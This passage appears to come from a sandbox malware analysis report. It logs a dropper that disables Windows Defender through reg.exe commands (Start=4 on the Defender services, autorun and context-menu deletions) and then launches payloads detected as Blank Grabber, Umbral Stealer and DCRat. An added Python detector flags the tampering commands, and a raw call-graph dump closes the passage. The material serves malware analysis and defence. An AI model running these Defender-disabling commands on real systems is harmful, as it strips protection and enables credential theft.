Start time: 03:42:08
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 03:42:08
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 03:42:08
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
Imagebase: 0x680000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                      Target ID:27
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:03:42:09
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:03:42:09
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

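The ten reg.exe invocations above (Target IDs 24 to 33) are a complete Defender-disabling sequence: two deletes remove the SecurityHealth autorun entry from both the Run key and its StartupApproved mirror, three deletes strip the Defender (EPP) context-menu handlers, and five adds set Start=4 (SERVICE_DISABLED) on the WdBoot, WdFilter, WdNisDrv, WdNisSvc and WinDefend services. The following detector is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses reg.exe add/delete command lines from process-creation events and tags the ones that match this pattern. The sample input is the ten command lines copied from this report plus one constructed benign line; the key regexes, category names and function names are this example's own.

```python
"""Tag Windows Defender tampering in reg.exe command lines (added example)."""
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Defender services whose Start value the sample sets to 4 (SERVICE_DISABLED).
DEFENDER_SERVICES = {"wdboot", "wdfilter", "wdnisdrv", "wdnissvc", "windefend"}
SERVICE_DISABLED = 4

# Key patterns (assumed here; they accept the short HKLM/HKCR and long root names).
SERVICE_KEY = re.compile(r"^(?:hklm|hkey_local_machine)\\system\\(?:currentcontrolset|controlset\d{3})"
                         r"\\services\\([^\\]+)$", re.I)
RUN_KEY = re.compile(r"^(?:hklm|hkey_local_machine)\\software\\microsoft\\windows\\currentversion"
                     r"\\(?:explorer\\startupapproved\\)?run$", re.I)
EPP_KEY = re.compile(r"^(?:hkcr|hkey_classes_root)\\(?:\*|directory|drive)\\shellex"
                     r"\\contextmenuhandlers\\epp$", re.I)


@dataclass
class RegOp:
    verb: str                    # "add" or "delete"
    key: str
    value: Optional[str] = None  # /v
    type_: Optional[str] = None  # /t
    data: Optional[str] = None   # /d
    force: bool = False          # /f


def parse_reg(cmdline: str) -> Optional[RegOp]:
    """Parse a reg.exe add/delete command line; None if it is not one."""
    try:  # posix=False keeps Windows backslashes literal and quoted args intact
        toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:
        return None
    if len(toks) < 3 or toks[0].lower().rsplit("\\", 1)[-1] not in ("reg", "reg.exe"):
        return None
    verb = toks[1].lower()
    if verb not in ("add", "delete"):
        return None
    op, i = RegOp(verb=verb, key=toks[2]), 3
    while i < len(toks):
        flag = toks[i].lower()
        if flag == "/f":
            op.force, i = True, i + 1
        elif flag in ("/v", "/t", "/d") and i + 1 < len(toks):
            setattr(op, {"/v": "value", "/t": "type_", "/d": "data"}[flag], toks[i + 1])
            i += 2
        else:
            i += 1  # /ve, /s, /reg:64 and friends are irrelevant here
    return op


def classify(op: RegOp) -> Optional[str]:
    """Return a tampering category for the operation, or None if it is benign."""
    m = SERVICE_KEY.match(op.key)
    if m and op.verb == "add" and (op.value or "").lower() == "start" \
            and m.group(1).lower() in DEFENDER_SERVICES:
        try:
            return f"defender_service_disabled:{m.group(1)}" \
                if int(op.data or "", 0) == SERVICE_DISABLED else None
        except ValueError:
            return None
    if RUN_KEY.match(op.key) and op.verb == "delete" \
            and (op.value or "").lower() == "securityhealth":
        return "securityhealth_autorun_removed"
    if EPP_KEY.match(op.key) and op.verb == "delete":
        return "defender_context_menu_removed"
    return None


def scan(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """Return (category, command line) for every tampering command found."""
    out = []
    for cmd in cmdlines:
        op = parse_reg(cmd)
        tag = classify(op) if op else None
        if tag:
            out.append((tag, cmd))
    return out


def disabled_defender_services(cmdlines: List[str]) -> Set[str]:
    """Lower-cased names of Defender services set to Start=4 across the events."""
    return {t.split(":", 1)[1].lower() for t, _ in scan(cmdlines)
            if t.startswith("defender_service_disabled:")}


# Sample input: the ten reg.exe lines from this report, plus one constructed benign line.
SAMPLE_CMDLINES = [
    r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f',
    r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f',
    r'reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f',
    r'reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f',
] + [rf'reg add "HKLM\System\CurrentControlSet\Services\{s}" /v "Start" /t REG_DWORD /d "4" /f'
     for s in ("WdBoot", "WdFilter", "WdNisDrv", "WdNisSvc", "WinDefend")]
BENIGN_CMDLINE = r'reg add "HKCU\Software\ExampleVendor\Settings" /v "Theme" /t REG_SZ /d "dark" /f'  # constructed

if __name__ == "__main__":
    for tag, cmd in scan(SAMPLE_CMDLINES + [BENIGN_CMDLINE]):
        print(f"{tag:40s} {cmd}")
    print("services disabled:", sorted(disabled_defender_services(SAMPLE_CMDLINES)))
```

Because Start=4 on WdFilter and WdBoot only takes effect at the next boot, a host that emits this sequence still has Defender running when the stealer payloads (Target IDs 34 to 36) start; the detection value is in the command lines themselves, which is why the example keys on them rather than on service state.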
                                      Target ID:34
                                      Start time:03:42:09
                                      Start date:30/10/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe"
                                      Imagebase:0x400000
                                      File size:7'888'384 bytes
                                      MD5 hash:B76057DF968A944446F950DD4DDC6AEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 83%, ReversingLabs
                                      Has exited:true

                                      Target ID:35
                                      Start time:03:42:14
                                      Start date:30/10/2024
                                      Path:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                                      Imagebase:0x730000
                                      File size:2'618'108 bytes
                                      MD5 hash:6E01D4882274684F48E04436103AD57F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 66%, ReversingLabs
                                      Has exited:true

                                      Target ID:36
                                      Start time:03:42:14
                                      Start date:30/10/2024
                                      Path:C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
                                      Imagebase:0x239bb8d0000
                                      File size:235'008 bytes
                                      MD5 hash:06129FFC46E854930CFCAA754CA1D487
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 84%, ReversingLabs
                                      Has exited:true

                                      Target ID:37
                                      Start time:03:42:14
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe"
                                      Imagebase:0xd60000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:03:42:14
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"
                                      Imagebase:0xd60000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:03:42:17
                                      Start date:30/10/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic.exe" csproduct get uuid
                                      Imagebase:0x7ff708a40000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:03:42:17
                                      Start date:30/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:03:42:23
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:03:42:23
                                      Start date:30/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:03:42:23
                                      Start date:30/10/2024
                                      Path:C:\blockweb\portrefNet.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\blockweb\portrefNet.exe"
                                      Imagebase:0x40000
                                      File size:2'300'928 bytes
                                      MD5 hash:84C6CB042DC58A109DFA2DB8381BEC28
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.1947296388.0000000002774000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.1947296388.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.1950988676.000000001256F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:10%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:9.3%
                                        Total number of Nodes:1518
                                        Total number of Limit Nodes:36
execution_graph: interactive call-graph view of the sample's functions (by address) and the Win32 API calls they reach; the node listing is not reproducible in text.
74ab2e SHGetMalloc 23184->23329 23185 74b3e1 23185->23141 23191 74b3f7 UnmapViewOfFile CloseHandle 23185->23191 23186 74bdf5 98 API calls 23189 74b4f3 23186->23189 23188 74b33e 23330 73ecad 80 API calls ___scrt_fastfail 23188->23330 23263 74d0f5 23189->23263 23191->23141 23194 74b355 MapViewOfFile 23194->23165 23195->23185 23197 74b3cd Sleep 23195->23197 23196 74bdf5 98 API calls 23200 74b519 23196->23200 23197->23185 23197->23195 23198 74b542 23331 7312c8 GetDlgItem EnableWindow 23198->23331 23200->23198 23202 74bdf5 98 API calls 23200->23202 23201->23051 23201->23077 23202->23198 23204 731314 23203->23204 23205 73136d 23203->23205 23207 73137a 23204->23207 23336 73da98 62 API calls 2 library calls 23204->23336 23337 73da71 GetWindowLongW SetWindowLongW 23205->23337 23207->23044 23207->23045 23207->23107 23209 731336 23209->23207 23210 731349 GetDlgItem 23209->23210 23210->23207 23211 731359 23210->23211 23211->23207 23212 73135f SetWindowTextW 23211->23212 23212->23207 23217 73a059 23213->23217 23214 73a113 23214->23109 23214->23110 23215 73a0ea 23215->23214 23216 73a207 9 API calls 23215->23216 23216->23214 23217->23214 23217->23215 23338 73a207 23217->23338 23219->23119 23221 739728 23220->23221 23222 739792 CreateFileW 23221->23222 23223 739786 23221->23223 23222->23223 23224 7397e4 23223->23224 23225 73b66c 2 API calls 23223->23225 23224->23167 23226 7397cb 23225->23226 23226->23224 23227 7397cf CreateFileW 23226->23227 23227->23224 23229 739677 23228->23229 23230 739688 23228->23230 23229->23230 23231 739683 23229->23231 23232 73968a 23229->23232 23230->23180 23385 739817 23231->23385 23390 7396d0 23232->23390 23235->23147 23236->23156 23237->23173 23239 74bdff __EH_prolog 23238->23239 23240 74b4e5 23239->23240 23405 74aa36 23239->23405 23240->23186 23243 74aa36 ExpandEnvironmentStringsW 23252 74be36 _wcsrchr 23243->23252 23244 74c11d SetWindowTextW 23244->23252 23249 74bf0b SetFileAttributesW 23251 74bfc5 GetFileAttributesW 23249->23251 23262 74bf25 
___scrt_fastfail 23249->23262 23251->23252 23254 74bfd7 DeleteFileW 23251->23254 23252->23240 23252->23243 23252->23244 23252->23249 23255 74c2e7 GetDlgItem SetWindowTextW SendMessageW 23252->23255 23258 74c327 SendMessageW 23252->23258 23409 7417ac CompareStringW 23252->23409 23410 749da4 GetCurrentDirectoryW 23252->23410 23412 73a52a 7 API calls 23252->23412 23413 73a4b3 FindClose 23252->23413 23414 74ab9a 76 API calls ___std_exception_copy 23252->23414 23415 7535de 23252->23415 23254->23252 23256 74bfe8 23254->23256 23255->23252 23257 73400a _swprintf 51 API calls 23256->23257 23259 74c008 GetFileAttributesW 23257->23259 23258->23252 23259->23256 23260 74c01d MoveFileW 23259->23260 23260->23252 23261 74c035 MoveFileExW 23260->23261 23261->23252 23262->23251 23262->23252 23411 73b4f7 52 API calls 2 library calls 23262->23411 23264 74d0ff __EH_prolog 23263->23264 23439 73fead 23264->23439 23266 74d130 23443 735c59 23266->23443 23268 74d14e 23447 737c68 23268->23447 23272 74d1a1 23464 737cfb 23272->23464 23274 74b504 23274->23196 23276 74cd38 23275->23276 23937 749d1a 23276->23937 23279 74cd45 GetWindow 23280 74b5d1 23279->23280 23283 74cd65 23279->23283 23280->23053 23280->23054 23281 74cd72 GetClassNameW 23942 7417ac CompareStringW 23281->23942 23283->23280 23283->23281 23284 74cd96 GetWindowLongW 23283->23284 23285 74cdfa GetWindow 23283->23285 23284->23285 23286 74cda6 SendMessageW 23284->23286 23285->23280 23285->23283 23286->23285 23287 74cdbc GetObjectW 23286->23287 23943 749d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23287->23943 23289 74cdd3 23944 749d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23289->23944 23945 749f5d 8 API calls ___scrt_fastfail 23289->23945 23292 74cde4 SendMessageW DeleteObject 23292->23285 23293->23064 23295 74a2e8 23294->23295 23300 74a30d 23294->23300 23948 7417ac CompareStringW 23295->23948 23296 74a312 SHAutoComplete 23297 74a31b 23296->23297 23302 74a7c3 23297->23302 23299 74a2fb 23299->23300 23301 74a2ff FindWindowExW 
23299->23301 23300->23296 23300->23297 23301->23300 23303 74a7cd __EH_prolog 23302->23303 23304 731380 82 API calls 23303->23304 23305 74a7ef 23304->23305 23949 731f4f 23305->23949 23308 74a818 23310 731951 126 API calls 23308->23310 23309 74a809 23311 731631 84 API calls 23309->23311 23313 74a83a __vswprintf_c_l ___std_exception_copy 23310->23313 23312 74a814 23311->23312 23312->23093 23312->23098 23313->23312 23314 731631 84 API calls 23313->23314 23314->23312 23315->23076 23317 74ac74 5 API calls 23316->23317 23318 74cb66 GetDlgItem 23317->23318 23319 74cbbc SendMessageW SendMessageW 23318->23319 23320 74cb88 23318->23320 23321 74cc17 SendMessageW SendMessageW SendMessageW 23319->23321 23322 74cbf8 23319->23322 23323 74cb93 ShowWindow SendMessageW SendMessageW 23320->23323 23324 74cc6d SendMessageW 23321->23324 23325 74cc4a SendMessageW 23321->23325 23322->23321 23323->23319 23324->23096 23325->23324 23326->23153 23327->23178 23328->23184 23329->23188 23330->23194 23331->23201 23332->23131 23333->23150 23334->23128 23335->23118 23336->23209 23337->23207 23339 73a214 23338->23339 23340 73a238 23339->23340 23342 73a22b CreateDirectoryW 23339->23342 23359 73a180 23340->23359 23342->23340 23343 73a26b 23342->23343 23348 73a27a 23343->23348 23351 73a444 23343->23351 23345 73a27e GetLastError 23345->23348 23348->23217 23349 73a254 23349->23345 23350 73a258 CreateDirectoryW 23349->23350 23350->23343 23350->23345 23372 74e360 23351->23372 23354 73a467 23356 73b66c 2 API calls 23354->23356 23355 73a494 23355->23348 23357 73a47b 23356->23357 23357->23355 23358 73a47f SetFileAttributesW 23357->23358 23358->23355 23374 73a194 23359->23374 23362 73b66c 23363 73b679 23362->23363 23371 73b683 23363->23371 23382 73b806 CharUpperW 23363->23382 23365 73b692 23383 73b832 CharUpperW 23365->23383 23367 73b6a1 23368 73b6a5 23367->23368 23369 73b71c GetCurrentDirectoryW 23367->23369 23384 73b806 CharUpperW 23368->23384 23369->23371 23371->23349 23373 73a451 SetFileAttributesW 
23372->23373 23373->23354 23373->23355 23375 74e360 23374->23375 23376 73a1a1 GetFileAttributesW 23375->23376 23377 73a1b2 23376->23377 23378 73a189 23376->23378 23379 73b66c 2 API calls 23377->23379 23378->23345 23378->23362 23380 73a1c6 23379->23380 23380->23378 23381 73a1ca GetFileAttributesW 23380->23381 23381->23378 23382->23365 23383->23367 23384->23371 23386 739820 23385->23386 23388 739824 23385->23388 23386->23230 23388->23386 23396 73a12d 23388->23396 23391 7396fa 23390->23391 23392 7396dc 23390->23392 23393 739719 23391->23393 23404 736e3e 74 API calls 23391->23404 23392->23391 23394 7396e8 CloseHandle 23392->23394 23393->23230 23394->23391 23397 74e360 23396->23397 23398 73a13a DeleteFileW 23397->23398 23399 73984c 23398->23399 23400 73a14d 23398->23400 23399->23230 23401 73b66c 2 API calls 23400->23401 23402 73a161 23401->23402 23402->23399 23403 73a165 DeleteFileW 23402->23403 23403->23399 23404->23393 23406 74aa40 23405->23406 23407 74aaf3 ExpandEnvironmentStringsW 23406->23407 23408 74ab16 23406->23408 23407->23408 23408->23252 23409->23252 23410->23252 23411->23262 23412->23252 23413->23252 23414->23252 23416 758606 23415->23416 23417 758613 23416->23417 23418 75861e 23416->23418 23428 758518 23417->23428 23420 758626 23418->23420 23426 75862f __dosmaperr 23418->23426 23421 7584de _free 20 API calls 23420->23421 23424 75861b 23421->23424 23422 758634 23435 75895a 20 API calls __dosmaperr 23422->23435 23423 758659 HeapReAlloc 23423->23424 23423->23426 23424->23252 23426->23422 23426->23423 23436 7571ad 7 API calls 2 library calls 23426->23436 23429 758556 23428->23429 23433 758526 __dosmaperr 23428->23433 23438 75895a 20 API calls __dosmaperr 23429->23438 23431 758541 RtlAllocateHeap 23432 758554 23431->23432 23431->23433 23432->23424 23433->23429 23433->23431 23437 7571ad 7 API calls 2 library calls 23433->23437 23435->23424 23436->23426 23437->23433 23438->23432 23440 73feba 23439->23440 23468 731789 23440->23468 23442 73fed2 23442->23266 23444 
73fead 23443->23444 23445 731789 76 API calls 23444->23445 23446 73fed2 23445->23446 23446->23268 23448 737c72 __EH_prolog 23447->23448 23485 73c827 23448->23485 23450 737c8d 23491 74e24a 23450->23491 23452 737cb7 23497 74440b 23452->23497 23455 737ddf 23456 737de9 23455->23456 23461 737e53 23456->23461 23529 73a4c6 23456->23529 23458 737f06 23458->23272 23459 737ec4 23459->23458 23535 736dc1 74 API calls 23459->23535 23461->23459 23462 73a4c6 8 API calls 23461->23462 23507 73837f 23461->23507 23462->23461 23465 737d09 23464->23465 23467 737d10 23464->23467 23466 741acf 84 API calls 23465->23466 23466->23467 23469 73179f 23468->23469 23480 7317fa __vswprintf_c_l 23468->23480 23470 7317c8 23469->23470 23481 736e91 74 API calls __vswprintf_c_l 23469->23481 23472 731827 23470->23472 23476 7317e7 ___std_exception_copy 23470->23476 23474 7535de 22 API calls 23472->23474 23473 7317be 23482 736efd 75 API calls 23473->23482 23477 73182e 23474->23477 23476->23480 23483 736efd 75 API calls 23476->23483 23477->23480 23484 736efd 75 API calls 23477->23484 23480->23442 23481->23473 23482->23470 23483->23480 23484->23480 23486 73c831 __EH_prolog 23485->23486 23487 74e24a new 8 API calls 23486->23487 23488 73c874 23487->23488 23489 74e24a new 8 API calls 23488->23489 23490 73c898 23489->23490 23490->23450 23494 74e24f ___std_exception_copy 23491->23494 23492 74e27b 23492->23452 23494->23492 23503 7571ad 7 API calls 2 library calls 23494->23503 23504 74ecce RaiseException FindHandler new 23494->23504 23505 74ecb1 RaiseException Concurrency::cancel_current_task FindHandler 23494->23505 23498 744415 __EH_prolog 23497->23498 23499 74e24a new 8 API calls 23498->23499 23500 744431 23499->23500 23501 737ce6 23500->23501 23506 7406ba 78 API calls 23500->23506 23501->23455 23503->23494 23506->23501 23508 738389 __EH_prolog 23507->23508 23536 731380 23508->23536 23510 7383a4 23544 739ef7 23510->23544 23516 7383d3 23667 731631 23516->23667 23517 73846e 23563 738517 23517->23563 23521 7384ce 
23570 731f00 23521->23570 23522 7383cf 23522->23516 23522->23517 23527 73a4c6 8 API calls 23522->23527 23671 73bac4 CompareStringW 23522->23671 23525 7384d9 23525->23516 23574 733aac 23525->23574 23584 73857b 23525->23584 23527->23522 23530 73a4db 23529->23530 23534 73a4df 23530->23534 23925 73a5f4 23530->23925 23532 73a4ef 23533 73a4f4 FindClose 23532->23533 23532->23534 23533->23534 23534->23456 23535->23458 23537 731385 __EH_prolog 23536->23537 23538 73c827 8 API calls 23537->23538 23539 7313bd 23538->23539 23540 74e24a new 8 API calls 23539->23540 23543 731416 ___scrt_fastfail 23539->23543 23541 731403 23540->23541 23541->23543 23672 73b07d 23541->23672 23543->23510 23545 739f0e 23544->23545 23546 7383ba 23545->23546 23688 736f5d 76 API calls 23545->23688 23546->23516 23548 7319a6 23546->23548 23549 7319b0 __EH_prolog 23548->23549 23558 7319e5 23549->23558 23560 731a00 23549->23560 23689 73709d 23549->23689 23551 731b50 23692 736dc1 74 API calls 23551->23692 23553 733aac 97 API calls 23557 731bb3 23553->23557 23554 731b60 23554->23553 23554->23558 23555 731bff 23555->23558 23561 731c32 23555->23561 23693 736dc1 74 API calls 23555->23693 23557->23555 23559 733aac 97 API calls 23557->23559 23558->23522 23559->23557 23560->23551 23560->23554 23560->23558 23561->23558 23562 733aac 97 API calls 23561->23562 23562->23561 23564 738524 23563->23564 23711 740c26 GetSystemTime SystemTimeToFileTime 23564->23711 23566 738488 23566->23521 23567 741359 23566->23567 23713 74d51a 23567->23713 23572 731f05 __EH_prolog 23570->23572 23571 731f39 